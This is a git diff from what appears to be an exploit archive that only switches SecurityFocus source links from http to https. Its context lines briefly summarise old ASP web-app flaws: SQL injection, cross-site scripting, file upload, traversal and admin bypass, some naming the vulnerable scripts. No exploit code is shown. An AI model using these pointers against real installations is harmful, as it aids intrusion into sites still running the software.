diff --git a/exploits/asp/webapps/20987.txt b/exploits/asp/webapps/20987.txt index f2e536642..029600442 100644 --- a/exploits/asp/webapps/20987.txt +++ b/exploits/asp/webapps/20987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2956/info +source: https://www.securityfocus.com/bid/2956/info Citrix Nfuse is an application portal server meant to provide the functionality of any application on the server via a web browser. Nfuse works in conjunction with a previously-installed webserver. diff --git a/exploits/asp/webapps/21308.txt b/exploits/asp/webapps/21308.txt index a9c16e779..0a7bc7a1d 100644 --- a/exploits/asp/webapps/21308.txt +++ b/exploits/asp/webapps/21308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4192/info +source: https://www.securityfocus.com/bid/4192/info Snitz Forums 2000 is ASP-based web forum software. It runs on Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21400.txt b/exploits/asp/webapps/21400.txt index 01a7ee331..7273e90a5 100644 --- a/exploits/asp/webapps/21400.txt +++ b/exploits/asp/webapps/21400.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4558/info +source: https://www.securityfocus.com/bid/4558/info Snitz Forums 2000 is ASP-based web forum software. It runs on Microsoft Windows operating systems. Snitz is back-ended by a database and supports Microsoft Access 97/2000, SQL Server 6.5/7.0/2000 and MySQL. diff --git a/exploits/asp/webapps/21434.txt b/exploits/asp/webapps/21434.txt index 8c0b70afb..d69b44053 100644 --- a/exploits/asp/webapps/21434.txt +++ b/exploits/asp/webapps/21434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4661/info +source: https://www.securityfocus.com/bid/4661/info Spooky Login is a commerical web access control and account management software package. It is distributed and maintained by Outfront, and is designed for Microsoft IIS Webservers. 
diff --git a/exploits/asp/webapps/21455.txt b/exploits/asp/webapps/21455.txt index b873062e0..92cfab903 100644 --- a/exploits/asp/webapps/21455.txt +++ b/exploits/asp/webapps/21455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4759/info +source: https://www.securityfocus.com/bid/4759/info Hosting Controller is an application which consolidates all hosting tasks into one interface. Hosting Controller runs on Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21457.txt b/exploits/asp/webapps/21457.txt index 3537eead2..84c6d669d 100644 --- a/exploits/asp/webapps/21457.txt +++ b/exploits/asp/webapps/21457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4761/info +source: https://www.securityfocus.com/bid/4761/info Hosting Controller is an application which consolidates all hosting tasks into one interface. Hosting Controller runs on Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21464.txt b/exploits/asp/webapps/21464.txt index a80f68be9..ccc651cc4 100644 --- a/exploits/asp/webapps/21464.txt +++ b/exploits/asp/webapps/21464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4778/info +source: https://www.securityfocus.com/bid/4778/info Hosting Controller is an application which consolidates all hosting tasks into one interface. Hosting Controller runs on Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21702.txt b/exploits/asp/webapps/21702.txt index 22fe75c2c..35a44e3a7 100644 --- a/exploits/asp/webapps/21702.txt +++ b/exploits/asp/webapps/21702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5438/info +source: https://www.securityfocus.com/bid/5438/info Midicart ASP is a commercially available e-commerce solution distributed by Coxco Support. It is available for the Microsoft Windows operating system. diff --git a/exploits/asp/webapps/21766.txt b/exploits/asp/webapps/21766.txt index a1c0dbc57..c2bf28ff9 100644 --- a/exploits/asp/webapps/21766.txt 
+++ b/exploits/asp/webapps/21766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5600/info +source: https://www.securityfocus.com/bid/5600/info FactoSystem Weblog is a freely available, open source software package for weblogging and managing content. It is available for Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21914.txt b/exploits/asp/webapps/21914.txt index d9c9909ab..477d0598b 100644 --- a/exploits/asp/webapps/21914.txt +++ b/exploits/asp/webapps/21914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5915/info +source: https://www.securityfocus.com/bid/5915/info SSGbook includes codes for allowing users to specify HTML formatting and layout inside of guestbook entries. For example, a user can include an image by including it inside of [image] or [img] tags. However, arbitrary HTML and script code are not sufficiently sanitized within these tags. diff --git a/exploits/asp/webapps/21920.txt b/exploits/asp/webapps/21920.txt index b316a5397..265bf8c4f 100644 --- a/exploits/asp/webapps/21920.txt +++ b/exploits/asp/webapps/21920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5922/info +source: https://www.securityfocus.com/bid/5922/info Microsoft Content Management Server 2001 is reported to be prone to cross-site scripting attacks. diff --git a/exploits/asp/webapps/21924.txt b/exploits/asp/webapps/21924.txt index 1e3a7408d..3251913f7 100644 --- a/exploits/asp/webapps/21924.txt +++ b/exploits/asp/webapps/21924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5928/info +source: https://www.securityfocus.com/bid/5928/info SurfControl SuperScout Email Filter comes with a web-based interface to provide remote access to administrative facilities. diff --git a/exploits/asp/webapps/21925.txt b/exploits/asp/webapps/21925.txt index 0b8c08c4f..8cd086e61 100644 --- a/exploits/asp/webapps/21925.txt +++ b/exploits/asp/webapps/21925.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5929/info +source: https://www.securityfocus.com/bid/5929/info SurfControl SuperScout Email Filter comes with a web-based interface to provide remote access to administrative facilities. diff --git a/exploits/asp/webapps/22357.txt b/exploits/asp/webapps/22357.txt index 6513c2b16..2211a27c2 100644 --- a/exploits/asp/webapps/22357.txt +++ b/exploits/asp/webapps/22357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7108/info +source: https://www.securityfocus.com/bid/7108/info A cross-site scripting vulnerability has been discovered in ClearTrust. Specifically, the login page for the management application is not properly sanitized of some user-supplied values. diff --git a/exploits/asp/webapps/22436.txt b/exploits/asp/webapps/22436.txt index 0fb594045..bb68d8af1 100644 --- a/exploits/asp/webapps/22436.txt +++ b/exploits/asp/webapps/22436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7211/info +source: https://www.securityfocus.com/bid/7211/info It has been reported that MyGuestBK does not sufficiently filter user-supplied URI parameters on the MyGuestBK Information Server 'Add Entry' page. diff --git a/exploits/asp/webapps/22437.txt b/exploits/asp/webapps/22437.txt index 897838439..bd2a90324 100644 --- a/exploits/asp/webapps/22437.txt +++ b/exploits/asp/webapps/22437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7213/info +source: https://www.securityfocus.com/bid/7213/info MyGuestBk has been reported vulnerable to unauthorized Admin Panel Access. diff --git a/exploits/asp/webapps/22484.txt b/exploits/asp/webapps/22484.txt index 43178fccf..e631ac18f 100644 --- a/exploits/asp/webapps/22484.txt +++ b/exploits/asp/webapps/22484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7328/info +source: https://www.securityfocus.com/bid/7328/info Ocean12 Guestbook Manager has been reported prone to sensitive information disclosure vulnerability. 
diff --git a/exploits/asp/webapps/22487.txt b/exploits/asp/webapps/22487.txt index f0b6e877b..ccec4e369 100644 --- a/exploits/asp/webapps/22487.txt +++ b/exploits/asp/webapps/22487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7341/info +source: https://www.securityfocus.com/bid/7341/info Web Wiz Site News has been reported prone to sensitive information disclosure vulnerability. diff --git a/exploits/asp/webapps/22507.txt b/exploits/asp/webapps/22507.txt index 805b2d57b..70bb83a27 100644 --- a/exploits/asp/webapps/22507.txt +++ b/exploits/asp/webapps/22507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7380/info +source: https://www.securityfocus.com/bid/7380/info Web Wiz Forum has been reported prone to sensitive information disclosure vulnerability. diff --git a/exploits/asp/webapps/22513.txt b/exploits/asp/webapps/22513.txt index a75bfc91c..c188a2f3c 100644 --- a/exploits/asp/webapps/22513.txt +++ b/exploits/asp/webapps/22513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7390/info +source: https://www.securityfocus.com/bid/7390/info MPCSoftWeb does not sufficiently secure the database file. It is possible for remote attackers to request the database file and gain access to sensitive information such as administrative credentials for the guestbook. diff --git a/exploits/asp/webapps/22529.txt b/exploits/asp/webapps/22529.txt index 02907c977..2bf47a4e1 100644 --- a/exploits/asp/webapps/22529.txt +++ b/exploits/asp/webapps/22529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7416/info +source: https://www.securityfocus.com/bid/7416/info bttlxe Forum is a web-based discussion forum implemented in ASP. diff --git a/exploits/asp/webapps/22554.txt b/exploits/asp/webapps/22554.txt index 337789831..51dadd50d 100644 --- a/exploits/asp/webapps/22554.txt +++ b/exploits/asp/webapps/22554.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7470/info +source: https://www.securityfocus.com/bid/7470/info A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface. diff --git a/exploits/asp/webapps/22555.txt b/exploits/asp/webapps/22555.txt index 39dd5ea01..b209a19dd 100644 --- a/exploits/asp/webapps/22555.txt +++ b/exploits/asp/webapps/22555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7470/info +source: https://www.securityfocus.com/bid/7470/info A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface. diff --git a/exploits/asp/webapps/22583.pl b/exploits/asp/webapps/22583.pl index 5eff162f1..49992132e 100755 --- a/exploits/asp/webapps/22583.pl +++ b/exploits/asp/webapps/22583.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7549/info +source: https://www.securityfocus.com/bid/7549/info Snitz Forums 2000 is ASP-based web forum software. It runs on Microsoft Windows operating systems. Snitz is back-ended by a database and supports Microsoft Access 97/2000, SQL Server 6.5/7.0/2000 and MySQL. diff --git a/exploits/asp/webapps/22639.txt b/exploits/asp/webapps/22639.txt index 5a3630c52..3599c8e7c 100644 --- a/exploits/asp/webapps/22639.txt +++ b/exploits/asp/webapps/22639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7675/info +source: https://www.securityfocus.com/bid/7675/info The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect. diff --git a/exploits/asp/webapps/22673.txt b/exploits/asp/webapps/22673.txt index 01916dce4..934804da4 100644 --- a/exploits/asp/webapps/22673.txt 
+++ b/exploits/asp/webapps/22673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7739/info +source: https://www.securityfocus.com/bid/7739/info A vulnerability has been discovered in the 'philboard_admin.asp' script used by Philboard. The problem occurs during authentication and may allow an attacker to gain unauthorized administrative access. diff --git a/exploits/asp/webapps/22697.asp b/exploits/asp/webapps/22697.asp index 2e0af8cc9..adf473511 100644 --- a/exploits/asp/webapps/22697.asp +++ b/exploits/asp/webapps/22697.asp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7765/info +source: https://www.securityfocus.com/bid/7765/info A vulnerability has been reported for iisCart2000 that may result in an attacker uploading arbitrary files to a vulnerable server. The vulnerability exists in the upload.asp script. This will allow an attacker to upload arbitrary files to the vulnerable server. Successful exploitation may result in the execution of attacker-supplied code. diff --git a/exploits/asp/webapps/22698.pl b/exploits/asp/webapps/22698.pl index b4c9d0c42..a193dc3bb 100755 --- a/exploits/asp/webapps/22698.pl +++ b/exploits/asp/webapps/22698.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7766/info +source: https://www.securityfocus.com/bid/7766/info This vulnerability is reportedly caused by a lack of sufficient sanitization of user-supplied data contained in URI parameters supplied to WebStores2000. diff --git a/exploits/asp/webapps/22724.txt b/exploits/asp/webapps/22724.txt index 956a0b56f..450125062 100644 --- a/exploits/asp/webapps/22724.txt +++ b/exploits/asp/webapps/22724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7804/info +source: https://www.securityfocus.com/bid/7804/info Several software products maintained by Xpressions Interactive are prone to SQL injection attacks. diff --git a/exploits/asp/webapps/22730.txt b/exploits/asp/webapps/22730.txt index a5d7b60be..cb3b328c5 100644 
--- a/exploits/asp/webapps/22730.txt +++ b/exploits/asp/webapps/22730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7813/info +source: https://www.securityfocus.com/bid/7813/info Mailtraq is vulnerable to cross-site scripting attacks. The vulnerability exists due to insufficient sanitization of HTTP requests to the vulnerable Mailtraq server. diff --git a/exploits/asp/webapps/22731.txt b/exploits/asp/webapps/22731.txt index f0d32bfee..06074e0e9 100644 --- a/exploits/asp/webapps/22731.txt +++ b/exploits/asp/webapps/22731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7815/info +source: https://www.securityfocus.com/bid/7815/info A vulnerability has been reported for Mailtraq that may result in the disclosure of path information. diff --git a/exploits/asp/webapps/22744.txt b/exploits/asp/webapps/22744.txt index b39733b28..1c0624a9e 100644 --- a/exploits/asp/webapps/22744.txt +++ b/exploits/asp/webapps/22744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7833/info +source: https://www.securityfocus.com/bid/7833/info Synkron.web is prone to HTML injection attacks. The vulnerability exists in the search script and is a result of insufficient sanitization of malicious HTML code from user-supplied input. HTML and script code may be echoed back when an existing user is views a cached search page. diff --git a/exploits/asp/webapps/22746.txt b/exploits/asp/webapps/22746.txt index 52e0a3643..5797c1875 100644 --- a/exploits/asp/webapps/22746.txt +++ b/exploits/asp/webapps/22746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7837/info +source: https://www.securityfocus.com/bid/7837/info A number of vulnerabilities have been discovered in the MaxWebPortal. diff --git a/exploits/asp/webapps/22747.txt b/exploits/asp/webapps/22747.txt index 7dfa58150..09e6df076 100644 --- a/exploits/asp/webapps/22747.txt +++ b/exploits/asp/webapps/22747.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7837/info +source: https://www.securityfocus.com/bid/7837/info A number of vulnerabilities have been discovered in the MaxWebPortal. diff --git a/exploits/asp/webapps/22778.txt b/exploits/asp/webapps/22778.txt index a5caa43dc..9fa1c22e7 100644 --- a/exploits/asp/webapps/22778.txt +++ b/exploits/asp/webapps/22778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7922/info +source: https://www.securityfocus.com/bid/7922/info Snitz Forums is prone to cross-site scripting attacks. This is due to insufficient sanitization of data passed to the search facility via URI parameters. diff --git a/exploits/asp/webapps/22864.txt b/exploits/asp/webapps/22864.txt index 98f180fab..8353f37c2 100644 --- a/exploits/asp/webapps/22864.txt +++ b/exploits/asp/webapps/22864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8103/info +source: https://www.securityfocus.com/bid/8103/info ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to reveal information relating to the underlying database; other attacks may also be possible. diff --git a/exploits/asp/webapps/22865.txt b/exploits/asp/webapps/22865.txt index b8caef056..0833079c9 100644 --- a/exploits/asp/webapps/22865.txt +++ b/exploits/asp/webapps/22865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8105/info +source: https://www.securityfocus.com/bid/8105/info ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to bypass the ProductCart authentication system and access the ProductCart administration panel; other attacks may also be possible. diff --git a/exploits/asp/webapps/22866.txt b/exploits/asp/webapps/22866.txt index 857712b48..96dbe2055 100644 --- a/exploits/asp/webapps/22866.txt +++ b/exploits/asp/webapps/22866.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8108/info +source: https://www.securityfocus.com/bid/8108/info A cross-site scripting vulnerability has been reported for ProductCart. The vulnerability exists due to insufficient sanitization of some user-supplied values. diff --git a/exploits/asp/webapps/22868.txt b/exploits/asp/webapps/22868.txt index f5a9da665..c405403fa 100644 --- a/exploits/asp/webapps/22868.txt +++ b/exploits/asp/webapps/22868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8112/info +source: https://www.securityfocus.com/bid/8112/info A vulnerability has been reported for ProductCart that may result in an attacker obtaining the contents of the database file. diff --git a/exploits/asp/webapps/22885.asp b/exploits/asp/webapps/22885.asp index 1bf407bd1..34eebb103 100644 --- a/exploits/asp/webapps/22885.asp +++ b/exploits/asp/webapps/22885.asp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8153/info +source: https://www.securityfocus.com/bid/8153/info Zone-H has reported that the Q-Shop ASP shopping cart software contains a vulnerability that may allow remote attackers to upload arbitrary files. Once uploaded, the attacker may be able to have the script executed in the security context of the Web server. It is reported that Q-Shop provides an interface intended for administrators to upload files, however when this file is requested directly, no authentication is required. diff --git a/exploits/asp/webapps/22888.pl b/exploits/asp/webapps/22888.pl index 71fc45b59..c99cbf857 100755 --- a/exploits/asp/webapps/22888.pl +++ b/exploits/asp/webapps/22888.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8159/info +source: https://www.securityfocus.com/bid/8159/info It has been reported that VP-ASP does not sufficiently sanitize user input passed to the shopexd.asp script contained in the software. As a result, it may be possible for remote attackers to embed SQL commands which are to be passed to the underlying database engine. diff --git a/exploits/asp/webapps/22889.pl b/exploits/asp/webapps/22889.pl index 7bae844b9..c9951ea7f 100755 --- a/exploits/asp/webapps/22889.pl +++ b/exploits/asp/webapps/22889.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8159/info +source: https://www.securityfocus.com/bid/8159/info It has been reported that VP-ASP does not sufficiently sanitize user input passed to the shopexd.asp script contained in the software. As a result, it may be possible for remote attackers to embed SQL commands which are to be passed to the underlying database engine. diff --git a/exploits/asp/webapps/22895.txt b/exploits/asp/webapps/22895.txt index 8aaf892de..630180751 100644 --- a/exploits/asp/webapps/22895.txt +++ b/exploits/asp/webapps/22895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8172/info +source: https://www.securityfocus.com/bid/8172/info It has been reported that a vulnerability exists in ASP-DEV Discussion Forum that exposes potentially sensitive information. Because of this, an attacker may be able to gain access to user credentials. diff --git a/exploits/asp/webapps/22921.txt b/exploits/asp/webapps/22921.txt index 7f02a0f46..07a0f53cc 100644 --- a/exploits/asp/webapps/22921.txt +++ b/exploits/asp/webapps/22921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8210/info +source: https://www.securityfocus.com/bid/8210/info .netCART is a web based e-commerce and shopping cart site designed for ASP.NET. diff --git a/exploits/asp/webapps/22992.txt b/exploits/asp/webapps/22992.txt index 06941febe..c87000a76 100644 
--- a/exploits/asp/webapps/22992.txt +++ b/exploits/asp/webapps/22992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8360/info +source: https://www.securityfocus.com/bid/8360/info IdealBB error.asp page has been reported prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/23032.txt b/exploits/asp/webapps/23032.txt index e3f7debd9..a9f81b121 100644 --- a/exploits/asp/webapps/23032.txt +++ b/exploits/asp/webapps/23032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8417/info +source: https://www.securityfocus.com/bid/8417/info It has been reported that a html injection issue exists in the Clickcess ChitChat.NET discussion forum software. The vulnerability is reported to be present in the Name and Topic Title text boxes. The problem may allow a remote attacker to inject malicious HTML and script code into the website. diff --git a/exploits/asp/webapps/23033.txt b/exploits/asp/webapps/23033.txt index 9b5f9d4da..c1e3bc770 100644 --- a/exploits/asp/webapps/23033.txt +++ b/exploits/asp/webapps/23033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8417/info +source: https://www.securityfocus.com/bid/8417/info It has been reported that a html injection issue exists in the Clickcess ChitChat.NET discussion forum software. The vulnerability is reported to be present in the Name and Topic Title text boxes. The problem may allow a remote attacker to inject malicious HTML and script code into the website. diff --git a/exploits/asp/webapps/23035.txt b/exploits/asp/webapps/23035.txt index e19fcafc3..d407dd8a5 100644 --- a/exploits/asp/webapps/23035.txt +++ b/exploits/asp/webapps/23035.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8426/info +source: https://www.securityfocus.com/bid/8426/info A vulnerability has been reported for Poster.version:two. The problem occurs due to the application failing to lock the 'setup' variable after initialization. As a result, an attacker may access this variable to add additional adminstrator users to the forum. This may effectively allow for the theft or modification of sensitive information. diff --git a/exploits/asp/webapps/23055.txt b/exploits/asp/webapps/23055.txt index 5f539ab5d..81db9a821 100644 --- a/exploits/asp/webapps/23055.txt +++ b/exploits/asp/webapps/23055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8480/info +source: https://www.securityfocus.com/bid/8480/info IdealBB is prone to an HTML injection vulnerability. This could permit remote attackers to inject malicious HTML and script code into board messages. The attacker's code may be rendered in the web browser of the user viewing the malicious message. diff --git a/exploits/asp/webapps/23120.txt b/exploits/asp/webapps/23120.txt index 1c04ba981..955beaf50 100644 --- a/exploits/asp/webapps/23120.txt +++ b/exploits/asp/webapps/23120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8563/info +source: https://www.securityfocus.com/bid/8563/info It has been reported that ICQ Webfront is prone to a cross-site scripting vulnerability in the message field of the guestbook module. This issue is caused by improper sanitization of user-supplied data. diff --git a/exploits/asp/webapps/23195.txt b/exploits/asp/webapps/23195.txt index b162c0828..db6edd106 100644 --- a/exploits/asp/webapps/23195.txt +++ b/exploits/asp/webapps/23195.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8722/info +source: https://www.securityfocus.com/bid/8722/info A-Cart has been reported prone to a cross-site scripting vulnerability. The issue presents itself likely due to a lack of sufficient sanitization performed on data contained in the 'msg' URI parameter that is passed to signin.asp. diff --git a/exploits/asp/webapps/23326.txt b/exploits/asp/webapps/23326.txt index 2de61c4d6..ebe1f7f66 100644 --- a/exploits/asp/webapps/23326.txt +++ b/exploits/asp/webapps/23326.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8948/info +source: https://www.securityfocus.com/bid/8948/info It has been reported that HTTP Commander is prone a directory traversal issue allowing a remote attacker to traverse outside the server root directory by using '../' character sequences. diff --git a/exploits/asp/webapps/23331.txt b/exploits/asp/webapps/23331.txt index 4d3ad5f5f..7731d5d0a 100644 --- a/exploits/asp/webapps/23331.txt +++ b/exploits/asp/webapps/23331.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8957/info +source: https://www.securityfocus.com/bid/8957/info A vulnerability has been reported in Web Wiz Forum that could allow unauthorized access to private forums. The problem occurs when handling malformed requests that make use of 'quote' mode. When this mode is used, Web Wiz Forum will allegedly fail to carry out sufficient checks between the requested forum and message. As a result, an attacker could potentially read or write to a private forum. diff --git a/exploits/asp/webapps/23335.txt b/exploits/asp/webapps/23335.txt index 0822d33e9..7b8570598 100644 --- a/exploits/asp/webapps/23335.txt +++ b/exploits/asp/webapps/23335.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8967/info +source: https://www.securityfocus.com/bid/8967/info It has been reported that VieNuke VieBoard may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. diff --git a/exploits/asp/webapps/23407.txt b/exploits/asp/webapps/23407.txt index 06192432e..779a402fc 100644 --- a/exploits/asp/webapps/23407.txt +++ b/exploits/asp/webapps/23407.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9133/info +source: https://www.securityfocus.com/bid/9133/info It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopsearch.asp' script of the software. diff --git a/exploits/asp/webapps/23408.txt b/exploits/asp/webapps/23408.txt index 42a31d03e..24ae660cf 100644 --- a/exploits/asp/webapps/23408.txt +++ b/exploits/asp/webapps/23408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9134/info +source: https://www.securityfocus.com/bid/9134/info It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopdisplayproducts.asp' script of the software. diff --git a/exploits/asp/webapps/23415.txt b/exploits/asp/webapps/23415.txt index b1e86fc6a..7dc740e18 100644 --- a/exploits/asp/webapps/23415.txt +++ b/exploits/asp/webapps/23415.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9164/info +source: https://www.securityfocus.com/bid/9164/info A vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site. diff --git a/exploits/asp/webapps/23440.txt b/exploits/asp/webapps/23440.txt index f3e62b017..809d7ed17 100644 --- a/exploits/asp/webapps/23440.txt +++ b/exploits/asp/webapps/23440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9223/info +source: https://www.securityfocus.com/bid/9223/info Multiple vulnerabilities were reported in EPIServer that include directory traversal, information disclosure, and denial of service. These issue result from insufficient sanitization of user-supplied input. diff --git a/exploits/asp/webapps/23515.txt b/exploits/asp/webapps/23515.txt index d3bab76ec..1e4511eb1 100644 --- a/exploits/asp/webapps/23515.txt +++ b/exploits/asp/webapps/23515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9354/info +source: https://www.securityfocus.com/bid/9354/info A problem has been identified in ASPapp PortalApp when user credentials are stored on a system. Because of this, an attacker may be able to gain unauthorized access to sensitive information. diff --git a/exploits/asp/webapps/23516.txt b/exploits/asp/webapps/23516.txt index 38ee15127..f12a3f536 100644 --- a/exploits/asp/webapps/23516.txt +++ b/exploits/asp/webapps/23516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9355/info +source: https://www.securityfocus.com/bid/9355/info A problem has been identified in ASP-Nuke when user credentials are stored on a system. Because of this, an attacker may be able to gain unauthorized access to sensitive information. diff --git a/exploits/asp/webapps/23547.txt b/exploits/asp/webapps/23547.txt index 4a4613896..bc77944c0 100644 
--- a/exploits/asp/webapps/23547.txt +++ b/exploits/asp/webapps/23547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9438/info +source: https://www.securityfocus.com/bid/9438/info XtremeASP PhotoGallery is prone to an SQL injection vulnerability. The issue is reported to exist in the administration login interface, which does not sufficiently sanitize user-supplied input for username and password values before including it in SQL queries. This could permit remote attackers to pass malicious input to database queries. diff --git a/exploits/asp/webapps/23561.txt b/exploits/asp/webapps/23561.txt index 107c71e5d..4e1f62357 100644 --- a/exploits/asp/webapps/23561.txt +++ b/exploits/asp/webapps/23561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9462/info +source: https://www.securityfocus.com/bid/9462/info It has been reported that various DUware products may be prone to an access validation issue allowing a remote attacker to gain access to sensitive resources by bypassing authentication. An arbitrary file upload vulnerability has been specified in DUpics that may allow a remote attacker to upload files to a vulnerable system. diff --git a/exploits/asp/webapps/23635.txt b/exploits/asp/webapps/23635.txt index 3603ed0c7..37aed9da3 100644 --- a/exploits/asp/webapps/23635.txt +++ b/exploits/asp/webapps/23635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9555/info +source: https://www.securityfocus.com/bid/9555/info The showcode.asp script activated in Sample_showcode.html may be vulnerable to a directory traversal issue. A remote attacker may view any files readable by the web server using '../' escape sequences in URI requests. diff --git a/exploits/asp/webapps/23676.txt b/exploits/asp/webapps/23676.txt index 8e9ae5f2a..c5b6fab76 100644 --- a/exploits/asp/webapps/23676.txt +++ b/exploits/asp/webapps/23676.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9625/info +source: https://www.securityfocus.com/bid/9625/info It has been reported that MaxWebPortal may be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied input. The specific issues include cross-site scripting, HTML injection and SQL injection. diff --git a/exploits/asp/webapps/23677.txt b/exploits/asp/webapps/23677.txt index 57d8c04ac..c544e4d20 100644 --- a/exploits/asp/webapps/23677.txt +++ b/exploits/asp/webapps/23677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9625/info +source: https://www.securityfocus.com/bid/9625/info It has been reported that MaxWebPortal may be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied input. The specific issues include cross-site scripting, HTML injection and SQL injection. diff --git a/exploits/asp/webapps/23696.pl b/exploits/asp/webapps/23696.pl index a096b87e9..ab8b3f340 100755 --- a/exploits/asp/webapps/23696.pl +++ b/exploits/asp/webapps/23696.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9659/info +source: https://www.securityfocus.com/bid/9659/info ASP Portal has been reported to be prone to multiple vulnerabilities. diff --git a/exploits/asp/webapps/23702.txt b/exploits/asp/webapps/23702.txt index 28422d3cf..ac9d05881 100644 --- a/exploits/asp/webapps/23702.txt +++ b/exploits/asp/webapps/23702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9669/info +source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software. 
